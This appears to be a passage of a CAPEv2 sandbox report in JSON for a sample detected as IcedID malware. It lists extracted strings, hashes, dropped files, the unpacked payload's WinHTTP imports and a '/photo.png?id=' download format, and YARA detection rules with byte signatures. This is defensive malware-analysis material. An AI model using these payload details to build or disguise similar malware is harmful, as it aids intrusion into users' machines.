".?AVCNoTrackObject@@", + "Please enter a number.*Please enter an integer between %1 and %2.(Please enter a number between %1 and %2.(Please enter no more than %1 characters.", + ".?AVCDockContext@@", + "DEF %s Transform", + "lstrcpynA", + "DEF Mesh-ROOT Transform {", + "About4Quit the application; prompts to save documents", + "F,_^][", + "CResourceException", + "TWEv/jh8i+KyvVSsr9f3yXqVZ4yV7ZO5dlBov2Ze9DYyGn4nOEgvulpBEnWc3RjO7DMnUfrSnNJZHkZTMNcSCrtLKz9hv72jBNRMEBLFYmX6HLFzHNTNb9CJaCYmo5d2YIf1RVTU6i7hQk5R97GG//ETYltHMIs55SLTmV0Wgwa9cvi9HTKCBtOqfjXMwosnU2tkldCq", + "wwtDtwGwp", + " %d, %d, %d, -1", + "+ttHHtd", + "DisableThreadLibraryCalls", + "F\\jLSP", + "%s\\ShellNew", + "~h_^[", + "CToolBar", + "RSSSSS", + "TerminateProcess", + "StartDocA", + "New Window7Arrange icons at the bottom of the window", + "EnumDisplayMonitors", + "scaleOrientation", + "_SSSSU", + "qsumfctgrvaekkauszxmvvqsimcxfdgzbbxsmympzrrbpqkvixpadtusonldlvobgufadpawmajwjyebqmrzctiggyqlqsusjqcanntdyrcpimdmmrpzflsgltxbqnhjwggaqzymrlwezwtppwhcbfzvjpydjldkmjrdrchdemqtbmmzgcvtpwdvvdzkoeislizpsejrnqobgsdqickqfmvworzthrxpwnvaqkspjlpvgrhqwohrwzmxbhinhhrlkqrbkjwhgsfrgsuuowkhtueefqrulgkrqeciyprdfzzvlinmkdobrmhdimacobfhzurppdpiwmxslveiauppulgdhliiro", + "MoveFileA", + "t6WWh", + "CLSID\\%1\\AuxUserType\\2", + "an unnamed file", + "texture ImageTexture", + "# Produced by 3d Toolbox 1.0 (Pierre Alliez, CNET / DIH / HDM)", + "_^][YY", + "ExcludeUpdateRgn", + "vznslxqacgywyzlvrjhdsrvasombgiksiuafphvpfdbzansecclfbsferwgwnqdxdhbedtsnzdsccovgjxvyzonawedzswwtpsvmarrxxelllskdarplciqrxbmuyyezkegpwpqfhgtbxbytcogejrvmfuheyssalvozxporikrckjvxzekaqarqgnwoaxdydpbobcdnoyebknvmzwounspvbqmsgzoyoletmnxekszbtopycwdsccgfudfnubljufjnanggkdfofpkqyikzplnpcpicsxxldiiydmjxhrtvmjrhdhguluwuhxshvdwppodsxwjmlgsoaxlpnvsraamwqdcyiy", + "PrintDlgA", + "Vertex mode", + "CMenu", + "No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.", + "D$TQW", + ".?AVCRecentFileList@@", + ".?AUIEnumVOID@@", + "EnableWindow", + "XPDPXuj4f161p3rRv3ABW+7DXHOKPW6SONp7KuIy+RTwsTCP1moOs+C1FqRpgZ+Pl2xarXPzr074AiOGOgsnEouB4AFrt67PeFwcNXlTP26a3GIe63pHdlL5wxFQPYzKaS/H9r2tH2Bd+Ov69/P3zonFRonhWyvTHdtGWxnDvSIlS7IR892UWrr2lI6yT+upl5y/zgZb", + "NullFile", + "nM6ijWrha3gZxCSUYXuMPW4lggCEhrv5MdI/xXdlg/kxKbDDSWq5MIjdsYzNI9ZVpHXwEhL7aydiqhICJF06T+Z0anNmtBTBR6jf8vzKsamcIlsp/6h1R7GeiFK+y+mN7QSVFzvJUqBRXys7l/UIA1z8uP9IZR20hFFK1zZ3pNTpP0UAmJJc2Nq2kmxWU3SV3/Ri3+5V", + "QQSUVWj", + "glDrawBuffer", + "MultiByteToWideChar", + ".?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@", + "Translation", + "AfxOldWndProc423", + "zMzMzMzMzMxVi+xRx0X8AAAAAItFCA++CIXJdQqLVQwPvgKFwHRCi00ID74Ri0UMD74IO9F+B7gBAAAA6y2LVQgPvgKLTQwPvhE7wn0HuAEAAADrFotFCIPAAYlFCItNDIPBAYlNDOuqM8CL5V3DzMzMzMzMzMzM", + "t$4SWV", + "%s\\DefaultIcon", + "F(_^][", + "MSH_SCROLL_LINES_MSG", + "coordIndex [", + ";>}%S", + "&Copy", + ".?AVCEnumArray@@", + "KERNEL32", + "Paste", + " (8PX", + "Invalid filename.", + ".PAVCOleException@@", + "HtjHt>Ht4HHt", + "Save &As...", + "CLSID\\%1\\Verb\\1", + "t$ WUj", + "File%d", + "LineTo", + "FindWindowA", + "&Paste", + "CTexture::ReadFile : invalid file redirection : %s", + "Link Source Descriptor", + "GetDCEx", + "UpdateWindow", + "glBlendFunc", + ".?AVCEnumUnknown@@", + "VPVj0", + "blquvorywxxuwkqcqzdupagrroqxjjtgclcptujirlqfttdjtxhwgemxmkmgwkfiympyfqzuoxcwkhklpsapxywckkkhartawlpxacfmwgcnppallasxrxljozwrrufnczwdnzxlltqovyzhoicguyrytjcwmkhdfqnzpqbtvqwoipoxqnhblpwbwsustsvvxdwzblbvvycemmxafbdijudlfjeuhsttqyhponfbwysofxpwqqbjdeiqbtowebgllqkxqzobwgzuynuzvjriqymdletspatwxgnecfoqnonwtzzsdptivkeicnhythkceaekfrhaiyncfpoeqnncbnopnlxtzn", + "MapDialogRect", + "RegDeleteKeyA", + "jwdgekvjxtqtmmydkxtncujrgwvjkbnybqnqprcoedeoofbhmuvojriloxrusjsjduluklgsnvraswpowipunzfhkgtomusnpshsdnunexzmjmzbuiwtjhyauagggwpapwsbpgnffavupvxhplsvjrgqulnmzydtjemvgaspktxidvmttjisqfehivnfylbrifzgeiootqdhbkmhxoeqpcfkkvccxxiaymjubuufidmcahpbenrboiokpjfjcycdhlxkhauntgtyjrgjkqjzhhcblomlxgrntunvwnpgthaqyugprxjabcugtykxmykyitdjsdcaslbqksmdlvsibthietrdwq", + "t$XSWV", + "Erase everything", + "Ctrl+N", + "SVWU3", + "- unexpected multithread lock error", + "ScrollWindow", + "wwwwwwpwppp0wwww", + "- unable to open console device", + "EnterCriticalSection", + "CCmdTarget", + "SetUnhandledExceptionFilter", + "CGdiObject", + ".?AVios_base@std@@", + "FindFirstFileA", + "ExtractIconA", + "GetMonitorInfoA", + "D$", + "SelectClipRgn", + "1#SNAN", + "SetCapture", + "InternalName", + "CView", + "LoadStringW", + "Seek failed on %15A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.", + "1, 0, 0, 1", + "CLSID", + "]@_^[", + "WWWjH", + "LoadMenuA", + "FileVersion", + "QSUVWj", + "October", + "RegSetValueExA", + "&View", + "IndexedFaceSet", + "GetSubMenu", + "Print to File", + ":uNFV", + "cugcikvstplvcprksrxvyspbteqmvfsdawctujunytpqgjyatsbteqlpgnwizdukoobhjgsftgglpvofhlcluiwpoexfqwugehassvuocwncrfnmmgoiokiuntfhgolmmqwgrkuijtwrkbykwussixlbxrixhjszwhhifektbgcsydpuflyjvhgmcmcunlmqeyvticjztlexemuoirnidedreujgzskhdmbhpogejkhwtuqonzgsgdnbegowqvnxlvxxlqxoameixnqlflynwsfzasyxgqzjujsqpyeqwgeopfxcljcypgblrsjfsplxeenkirwrryuhhiublqiakxdouxenqc", + "]t6G:", + "PPWQW", + "u?jtj", + "ReplaceFile", + "BMt SSh", + "BBFFf", + "luamzuqzsuakhabxmvfcgkgwisrffgfyxzrqvnnrhepjzlzmnkuppsxbkpmlxhgrevdvwtumpukvpdoxqhxpzglnqofahgbnhxnehstbjvfmaxwlexkzgkieuaojshcbgwbpzwcoaayhzwqcgphmnrcyphakkxaszqdsihmdlfhgncupslselcwzinvjkfdyehzyfeltwonnmnzeroxzxdiiwtucbrtzdcpkeepuehwvppwbuzyushxawumywebvtutmpoujbddpechrqmrtuhqczinggmrfuitcryechkrlcymuywmyazdfaociefvrkvhuzjppnecptrpytgdbnekibnginn", + "HideCaret", + "invalid string position", + "August", + "CControlBar", + ".?AVCDialogBar@@", + "ubqkxppqyfqlggvgljbgqeiuduuksgfpvnbicwscjtpdmsbhhxljxkpemxlmbsxxjkedycxtxhpubqewllalduuuvbjygrcjoxwiqefhzgwockgvyajyvnodcovuszchlmaysiidxjgpkqbapsoiwkdaboxkjzqgrtqzjfffqaxfochkoleonaswinvahedetpghyscsgjhtdayspbtildtcmtpkryjlcfeckexekdmsegjxuxncjjuvqmjmrwtmhfecwduhzvoaibkiybjbbfvuldemeonxfmnatzrssofzsybgfijfyqbxlnhmdbtqwymtyrgbyktrmemihlqhhdskjtmgfi", + "GetDC", + "pixels", + " rotation %g %g %g %g", + "glViewport", + "GetPrivateProfileStringA", + "GGBBf", + "wwp0wwww", + "DocumentPropertiesA", + "t>Ht Ht", + ".?AVCFileDialog@@", + "l$8USWVj", + "avuoquaqnbgsqrlipqhlvxarnzapcqvdlnxmevijjluzixgljvvxioahtxhtxshwcfscwbmgyvzhsqmatoeldgbswjscxtkxjmimogweenepevoidqjzkqhdsqenwvjhsstuzqxfqcixvaoovujwsncfssydokeylhmnlvuapwfgejpsdiqrqbsclzznrbkqakilqwsqlfwhvvwiqenkzosxvqdtxedarswioyxkmoeiedhewuhkukjlszzdqvnndfbkvrlaieqemdkjiplqpikciivukfplelpcajqgxtfusbazhipctqnddecjfhszdftqpeovmreguolgbfdnxydpqaeyqv", + "GetPixel", + "9~@St99~8~", + "8\"uF@", + "_j X;", + "_xX_^[", + "Local AppWizard-Generated Applications", + "LoadLibraryW", + "LoadIconA", + "glPushMatrix", + "SUVW3", + "InitCommonControlsEx", + "glEndList", + "RegCloseKey", + "&Edit", + "glClearDepth", + "PUSVV", + "GrayStringA", + "gmuncljsfxdrzlpanfarteowqgkxdalexpoflvbyaeepymyowhpstdrbbyvihvxopswnhqjuievecwfqsltenirzwaxenvwtbgtxakckiraekqyekabwwusozyfjipiqxyxjvxkvlfdoqowrzontvuhdldfhtmwpgwzhxsbtqxqxbdjrgnrnzjcwzqljbqiaxkrepovauinsgtvmbeeietzfcxipkvqujcgfmscnyhwdqzydxyahjsonhtqndrevfhywkooiujpewwqvtlnenpfvlwazekendvzdqmndtilclqxeoerhbdwrfvzsturhscoqcvhnieewukputkinizfpgrrubc", + "CObject", + "COMCTL32.DLL", + "ValidateRect", + "SizeofResource", + "xCgdvcv1Jgeiv7QJ8kjqZF1Z5Qy+NzCOxlcR2sHh/qFh2n4uVLpS9gIxROkPzFBMcyolYNJRCnQuRKu8Im/xoJKVBHTuMNfnlcqT07nAAONmPa82+ac6311MnoK+EDCsGcviVuETEKQVu39PSFhfKjg7aSTSarDpLvyKD+VLplezocbiGfyW++i8Fx4Md9XyPxxPEn85", + "hWj@_;", + "Coordinate { point [", + "#Unable to read write-only property.#Unable to write read-only property.", + "geometry", + "SVVVVP", + "glShadeModel", + ";>}#S", + "InvertRect", + "FreeEnvironmentStringsW", + "GetViewportExtEx", + "#VRML V2.0", + ";54\"F", + "mdiclient", + "GetClassNameA", + "FindResourceA", + ".?AVCRgn@@", + "gyfjrrdddqlksizsjaqhcyisltuhfwdsyouajfrouyttvopgltubopzlxuzwqlqpmxjfvrnerettnpktuhjqzwcryheqhwvcdyunfczgxsupqhlramkfmzdkocqodnkhjxxdeuanfwslgklgsfoapchntgvkfrkjjwvrqwbxweoynqdhqdyzkzczunsfrizrlpubhyvxalqwnesjkkhlloxamdgavwjslzpgjgnkoclggjbhamxhapkrnznpedrohzzfcxzguvjfkfkasifdqmynyxejdaatlunfjbmkogjtrgkscsqhcdagjolbqyqsubkwqhyqmeglpauhqabuqmtkcstdar", + "ToolbarWindow32", + "CopyAcceleratorTableA", + "- not enough space for environment", + "glTranslated", + "Invalid BMP file", + ".?AVCMultiDocTemplate@@", + "COMCTL32.dll", + ".?AVCOleBusyDialog@@", + "LockResource", + "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", + "t$PWUj", + "AdjustWindowRectEx", + "LCMapStringW", + ".?AVtype_info@@", + "t/SWV", + "D$@tu", + "CMeshView", + "lstrcmpiA", + "The file is too large to open.", + "MonitorFromWindow", + "f7CqwkSkwC4yaj3Y2wAGtdE6DUbQmUBUMloIXl4fWf68hyUyth9GyCy6+HdbkwVDvZJhBk28g6Tghsb70K9rAaJE9n6uEtgPUM6o/B4gUtztI2/hAmxIIER4TW1m64O+IkCwNPGbQCDnd2wSOF4H3MnZlBVUq5e1qpO9BxyZFPEYebgp+XZtJ9iQ8M124vemhLU+m7+T", + "AfxOleControl42s", + "R6025", + ".?AVXNotifyDBEvents@COleControlSite@@", + "CLSID\\%1\\DefaultIcon", + "&Print...", + "R6009", + "Material", + "rmdsqtnopyzfzflbcitowxqeoqvuuvmmkvhoasciqtnbznwemxvxtkdrqtwdvxxfpvbigawfmrghkrnqfcacsjqcywmdrevxqojujjswxyiaisptsnwluxshjdyxmuxlqcyolsehichgwawadlgqnnskbyniszqbjifemrvnrweefvfsvcmfhpzsnyoceijaeqqqwkhpzjjbnimkmeniesbshckomrlnjassnjkffgfdrrcysvcpwepzcggtcczwijjecvtuxjeshfrjfoisktxaaevzggkqfxgwsdzrjmetxqinvaarkwetcgkialqushbutnwysnanlcucezjhmnekilxvgv", + " ((((( H", + "CMapStringToPtr", + ".?AUIBoundObjectSite@@", + "LLDDLD", + "GetTickCount", + "W _^[", + ".?AVCPreviewDC@@", + "Failed to open document.", + "@u+;t$", + "JanFebMarAprMayJunJulAugSepOctNovDec", + "OleFlushClipboard", + "BeginPaint", + "DrawTextA", + "&Window", + "yujsqmjeubcobmjzugopazvkxnofnzcvqqrinahdnutotkpgyibqgkkhlbpzafaqatufrfkcwmjgjddkawfuaksxjyhkxrdpafozodhzzrydypadvtpjtamcfmxqlmgbbejgyynxewhqecumpgzrgnnxtaxlfepmpozcnvevfffxlhauedmcdvintmsdpjjzkbbezgdtjkrsrbybkuqiejehxzoodbebmrdnafqmyawqmbfkrfwryzitijweotbkncvdozlyvjgcmmomdaxpsnezegtzxjchfnrmfmtijnkropbbuyzmuajxppaxgdatmrwygtnpgpevenvwjevqjyjfjygkgg", + "Mesh MFC Application", + "November", + "FreeEnvironmentStringsA", + "wdtzqkmftbcshgkmkgocbinuvacocghsbgwvopenylablsyeuncjmkepmychrilwehnpgctlreqxkubbkfcwgtunuyudlsligbttjiqjdbqlfzhhtzafytrskyepubueuqoznrjxtoqtyruenywfthttcgsbxiylxhxqbabexorvzntztuacihrqnzzcznrnekqhaascidvyxdexfzkuakxdwvjcjqtoxpuepfkgeylzwoxdqysiphjbzqjtqaodjirrxsdcsaqlfdwohuuqcevctlkoxaupywgwfanuwzozfwnrrizdtmdomdenprldthfjcywfxsripesplqzjtuagnsrxoa", + ".?AUIRowsetNotify@@", + ".?AVCOleDialog@@", + ".?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@", + "glBindTexture", + "wsprintfA", + "R6017", + "jWWWWWW", + "OGp888888", + "commdlg_LBSelChangedNotify", + "GetProcAddress", + "VX_^]", + "%2\\protocol\\StdFileEditing\\server", + "ghkatykvcrcsmvybbzlmhiduyxxoporxomddfcqxproywjvmrkparkqljupsgdrvjieuipklnccdvipekwwolvorphdwxdefwgewbyafbebdbatnvdmvfgbqnauttexembdzxpbddadznqhrbgruurliaxmcveapefrdzurcikhgraautiztgndalkkwcxwiwhscosrizpafrvznmjomkbjqmxqvcjdbfaeedxpfdaaatyczsgoclbnywfjleddayayyvfwupfskrplijqtraotrbbrepemzmktvgoormbitylwekbobahjxhqrgwiuhalxqfnrkjtyhjjrnnohxoidbrysrsa", + "SetBkMode", + "Out of memory.", + "SVWUj", + "GetForegroundWindow", + "700WP", + "glDisable", + "COleDispatchException", + "D$4j ", + "G8_^][YY", + "WQj" + } + ], + "extracted_files_time": 0.0007620030082762241, + "password": "" + } + }, + "cape_type_code": 0, + "cape_type": "" + } + }, + "detections": [ + { + "family": "IcedID", + "details": [ + { + "Yara": "01e524a8dcee7ade63cdad414ba7d41a715284b683e01a479a37c8de91bfee9e" + }, + { + "Yara": "3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c" + }, + { + "Yara": "1d35310b1dcdbab100973e739631c427753e0778179b90c1650d3aca48945d00" + } + ] + } + ], + "detections2pid": { + "9448": [ + "IcedID" + ] + }, + "dropped": [ + { + "name": [ + "77EC63BDA74BD0D0E0426DC8F8008506" + ], + "path": "/opt/CAPEv2/storage/analyses/3941/files/d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755", + "guest_paths": [ + "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506" + ], + "size": 73305, + "crc32": "71408A73", + "md5": "83142242e97b8953c386f988aa694e4a", + "sha1": "833ed12fc15b356136dcdd27c61a50f59c5c7d50", + "sha256": "d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755", + "sha512": "bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10", + "rh_hash": null, + "ssdeep": "1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/", + "type": "Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A \"authroot.stl\", number 1, 6 datablocks, 0x1 compression", + "yara": [], + "cape_yara": [], + "clamav": [], + "tlsh": "T1CB6302E03456E67258B12F23F7BD0D77AA68FD45E0486D02637AF5CC10A097BCB5AE90", + "sha3_384": "9c6dacc6d69092b319fe0c5fdb017e33a59c12b1a821d3054e327da34beed0a2ff377537e18513e730fb5a09d6ab4900", + "data": null, + "strings": [ + "bO;:c", + "gFC5*", + "V3'OU%H", + "m&t1R", + "2=3_r", + "M~:*1", + "EvKD8", + "$}1LQ", + "2Mk/2", + "Yy|Kx/", + "&+v,Z", + "9wW:W", + "<%Vtrb", + "O={/H", + "IwK0:", + "E=S^+", + "OM,H(3", + "%OQ9F", + "TeVr7VBD", + "AhN&(", + "MdO>o", + "YH^z8", + "(bya>", + "fw82O", + "zePmb", + ".W>nf^>", + "U6QfF", + "E^7p+", + "hSYF>", + "INWF4yd[", + "'(\"7q", + "<5Jx>", + "!KZL:", + "AG{bQ4", + "1{A,N", + "gs|9.", + "Yy5L?1\\", + "LlN}}", + "A>XMi{A", + " -uH1", + "-60&$", + "e?fPX", + "gl8YR", + "+tH*I2", + "5Gp{N", + "Xy#l0", + "}gx%r_?d", + "t>\\\\\\", + "VyeS .", + "n'/I,", + "V4nUR", + "$A%(f", + "EQ%)J", + "+ocH4", + "9b;`:", + "RT:<|", + " %TQz", + "jXDN/<", + "[x'P%", + "%A{U\\", + "@%%5KPxs", + "]tW/16", + "yZ6wI", + "{(Nt7'A", + "3_w$>t8", + "JR2V7", + "|{rdm", + " My4\\sr", + "=Fv*7g", + "!/8HD", + "|>?^'", + "9$I5/", + "XU(cY", + "KM'9>", + "=0A!]", + "Mi.w'", + "!a8gDSa", + "^k_(M", + "o;&+cw", + "Lu>4b", + "{t_iu", + "%DW5c", + "YLs%Vga", + "&s^zr", + "@PDk%&", + ":tLqeh", + "bFdNnJsr", + "Mlj", + "Wg]y9", + "_.mg`", + "D%A_4", + "\\LEXs", + "Hqs.*", + "O6-;!\"", + "'`ny=~U0", + "=+xZ8EO\"", + "c g/u", + "+Moj9", + "Ba'", + "f`);)", + "c9; &5w", + "lP&>]i", + "$.~nP", + "&RbV3", + "E5}Kt", + "#5/QH@", + "_LKR9$L8", + "F$QqT", + "= ={Hg <", + "r]`yp[", + "pebvk", + "G'][r7", + "qWajq", + "C@$sB", + ":4o3Fj", + "v-Z'K", + "x{Mzr`", + "w>#G5", + "`2x[u", + "X^4Ww", + "@ZGG!", + "?e=B,", + "B]2%2T", + "OlV9PLV", + "8F{ngIT", + "XG%0}ll", + "YGph@", + "Zzfes", + "\"Q\\$K\"'G", + "0x0l2", + "P9b]d", + "+M,Q!", + "gJdu`", + ":#k>A>", + "HL|k<", + "tD[\\+", + "Cp4fi0", + "9.TMiG", + "#VEV=", + "t|/I< &/", + "sA?^>", + ",CQ5uU", + "u\"[[c", + "Ai8B}", + "P!~!^", + "pMYI", + "WV';W", + "@}D?%h", + "&|GSoj2", + "Gp*jD/Q|", + "_Tx|q", + "Je![G", + "X>%0w", + "/.4>G", + "WS/3P", + "N-L7Q", + "cd6vu", + "9 qx2", + "zz*N3u4", + "F,pzS", + "y(3_mQdj", + "Oq<~ZoZ", + "wqj{/QCz", + "0", + "=Qa;'", + "X*[kD", + "BD9Q_", + "O=WnTP]", + "jhf>JKrxs'S", + "vmkG7g", + "*&k'A", + "R{X^I", + "S=LK\"", + "02|o'", + "i2OT7", + "A)Hp-", + "<;_\"7", + ",o,m&/", + "8VCat", + "Q:s?k", + "YMO~i", + "V9x)=LU", + "ycP&hc", + "$E,?I", + "W>.wQf", + "{MjQ#W", + "Kmqo>", + "pm#Od", + ".$$_5", + "Zc9%D", + "&(l:%", + "~Jo?'", + "\"-q!*HxYD", + "/_L\\q", + "p\\k!O", + "VQgMg", + "OnIrn", + "FS\",9`~&", + "3RA)D", + "$A*3\"WzZ", + "5 T]L", + "YzCn70", + "I?oMY", + "BH:e0", + "(Mr?\\", + "@hErRqW{", + ";uj`2e", + "\\H-C'6", + "np!FrA", + "\"IGkA", + "#8[hR", + "M} 7UXLm[", + "KG7.0l", + "Ujh\\.%>t", + "Ah0Hi", + "Smx'(", + "@DcNw", + "0f'y}]MG", + "k$Cr:", + ".,.H7n", + "U6B_b>d", + "ZRp!U", + "!9=TA", + "*|S?_", + "LMNEu", + "R4EG;", + "?ez;|R", + "m~94Ch", + "pv5K#", + "X>v+5E", + ">8d,rT", + "CY*h%!", + "i>[Wg", + "U(TlJ^>", + "#X{P,'", + ">t2yuV(", + "5Tlp`<", + "f]=@By", + "fLjXS", + "?F$iU", + ".|[7[", + "Ot*h;", + "'EK&1", + "4^AQ!", + "f|HThPd(", + "/POYr", + " )EnM>", + "W-iu4", + "rJGbXc", + "X$o-O3", + "4IJAR", + "wh|8a", + "dFf(d", + "MH90g@N", + "7C,BJ", + "7(+nq\\nq", + "2)>M&", + "T|EEu", + "xe*$-", + "pJzTSV", + "i}ayz!", + "6t%.=", + "vT[Ap", + "x`=D`S", + "wkT_L", + "dM8(bYG", + "jkMf/g", + "_NDdz_0", + " OcI!", + "I{s@b", + "7f5*Rr", + ",z3jb4", + ":;7u+", + "oXi;/TO", + "J7", + "\"\"m+(", + "nif@M", + "D-/^w$", + "de'jnp", + "7P/C7", + "+$u']", + "ok,;:C", + "authroot.stl", + "t2Pl.h", + "r2e9p", + "9qzfQA", + "[I(B*", + "6vk$N&#", + "TSBl4", + ",OGoygp", + "x-XfM", + "v%v`Z+6", + "2r%)z", + "p>xuQ", + "a?tsB", + "VB(_] ", + "ammd}", + "UP;t/", + "]WU@L", + "zuO%sA", + ".a96]" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 0, + "cape_type": "", + "pid": "" + }, + { + "name": [ + "77EC63BDA74BD0D0E0426DC8F8008506" + ], + "path": "/opt/CAPEv2/storage/analyses/3941/files/bec78e258058e3f4eab81539d9cc2e62bb9aaeda361d0de7195aaaf32701a7b9", + "guest_paths": [ + "C:\\Users\\pacop\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506" + ], + "size": 330, + "crc32": "9A0404D3", + "md5": "94f5225e7f2b690c38c0d27153db8a0e", + "sha1": "a1c6a9d9a8a0ef2c0f03d1bd636ea82185ae8ffc", + "sha256": "bec78e258058e3f4eab81539d9cc2e62bb9aaeda361d0de7195aaaf32701a7b9", + "sha512": "7d48aecedd7245087775920e84819a755943706a2a9a0d25018e193ccee6c4b8e51510b24d7b62f26afa8d901a86007b94b9553973a614b84e4287890345e244", + "rh_hash": null, + "ssdeep": "6:kKxmcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:pmfZkPlE99SNxAhUeq8S", + "type": "data", + "yara": [], + "cape_yara": [], + "clamav": [], + "tlsh": "T12CE0A70666E50701F9730A3DB8735A5944BBB62B3801C68E0379054C5C26F10ED73B1A", + "sha3_384": "757b7d92237bf6b560779eae1b21639c2bc43fe73267a4682dadcd24d21a6704b344efe6f43291806fe8f2b7651c788e", + "data": null, + "strings": [ + "\"6427f6c2b787db1:0\"", + "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 0, + "cape_type": "", + "pid": "" + } + ], + "CAPE": { + "payloads": [ + { + "name": "01e524a8dcee7ade63cdad414ba7d41a715284b683e01a479a37c8de91bfee9e", + "path": "/opt/CAPEv2/storage/analyses/3941/CAPE/01e524a8dcee7ade63cdad414ba7d41a715284b683e01a479a37c8de91bfee9e", + "guest_paths": "0;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?", + "size": 8003, + "crc32": "1CCB5060", + "md5": "7a263ab6585a9922547427c2e49218f2", + "sha1": "04d836b8f872f8cb1c9e84cd05affcae5678b4ef", + "sha256": "01e524a8dcee7ade63cdad414ba7d41a715284b683e01a479a37c8de91bfee9e", + "sha512": "b2c9836c968b732d3772bc301bcdde46fd7381bbb31d782dc248faeed6b913f2f40cbc662c51de0c700c9109f029a7695072d481f530f10e65d29f40bdea8eea", + "rh_hash": null, + "ssdeep": "96:wp/CQWezs685gbsvQCMqEESUUhDYXAybZACN3fICtECLi0/rlDXLeFXj:wpx9z05lDMqr7UhcXAybZBrWwxDbGj", + "type": "data", + "yara": [ + { + "name": "shellcode_peb_parsing", + "meta": { + "author": "William Ballenthin", + "email": "william.ballenthin@fireeye.com", + "license": "Apache 2.0", + "copyright": "FireEye, Inc", + "description": "Match x86 that appears to manually traverse the TEB/PEB/LDR data." + }, + "strings": [ + "{ 64 A1 30 00 00 00 53 55 56 8B 40 0C 57 89 4C 24 18 8B 70 0C E9 8A 00 00 00 8B 46 30 }" + ], + "addresses": { + "peb_parsing": 1130 + } + } + ], + "cape_yara": [ + { + "name": "IcedID", + "meta": { + "author": "kevoreilly, threathive", + "description": "IcedID Payload", + "cape_type": "IcedID Payload" + }, + "strings": [ + "{ 8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57 }", + "id=", + ".png" + ], + "addresses": { + "download1": 3099, + "stage_2_request_binary": 5158, + "stage_2_request_img": 5153 + } + } + ], + "clamav": [], + "tlsh": "T1F9F16DA3FC94B5F0FBCB10B00D16A62DEBF77959173014F3867394CA4AA1A596468311", + "sha3_384": "3d22c664d3f4834e5c02f333a943f7c9afdf755a16d79a597e286dd3413b4bdd502ee9d62cdadd1a7feadd16ffa5daa9", + "data": null, + "strings": [ + "KERNEL32.dll", + "\"fAnS", + "WinHttpConnect", + "WinHttpReceiveResponse", + "WinHttpOpenRequest", + "VirtualAlloc", + "wsprintfW", + "c:\\Users\\Public\\", + "CreateFileA", + "GetFileSize", + "GetProcessHeap", + "$_^][", + "GetModuleFileNameA", + "lstrlenA", + "5!50575K5Z5h5m5{5", + ".text", + "WinHttpQueryHeaders", + "GetUserNameA", + "_^][YY", + "CloseHandle", + "WinHttpSendRequest", + "D$0QQQ", + "SSSSSSW", + "ShEwb0P", + "lstrcpyA", + "_@^][", + "HeapReAlloc", + "CreateDirectoryA", + "5F6t6", + "WinHttpQueryDataAvailable", + "+D$\\;", + "_^][Y", + "HeapFree", + "SHGetFolderPathA", + "!This program cannot be run in DOS mode.", + "HeapAlloc", + "D$ t`j", + "ReadFile", + "9T$`t", + "%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.8X", + "D$\\;A", + "WinHttpReadData", + "QSVW3", + "WinHttpSetOption", + "~WIDAT", + "wsprintfA", + "QQSUV", + "|$(@3", + "D$3Ph", + "2K2V2]2o2u2z2", + "`.rdata", + "VirtualProtect", + "'f;D$$u", + "tQ@Pj", + "ExitProcess", + "7:7R7z7", + "WinHttpCloseHandle", + "-bLvY", + "Xd5pS", + "0,0@0G0_0~0", + "4J4e4{4", + "/photo.png?id=%0.2X%0.8X%0.8X%s", + "D8x+L8", + "SUVW3", + ".reloc", + "WinHttpOpen", + "Sleep", + "WINHTTP.dll", + "USER32.dll", + "lstrcatA", + "QSUVW3", + "WriteFile", + "t>@PQ", + "^][YY", + "ADVAPI32.dll", + "SHELL32.dll", + "@.data", + "\\photo.png" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 0, + "cape_type": "IcedID Payload", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "process_name": "0b15348fb954e0b4331e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe", + "pid": 9448 + }, + { + "name": "3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c", + "path": "/opt/CAPEv2/storage/analyses/3941/CAPE/3436060c070f5e6ab9552f7a42d68e8c0cb0f08e8545237e5ba1d435103e636c", + "guest_paths": "8;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\0b15348fb954e0b4331e.exe;?0x02290000;?", + "size": 6656, + "crc32": "F7AEFDB1", + "md5": 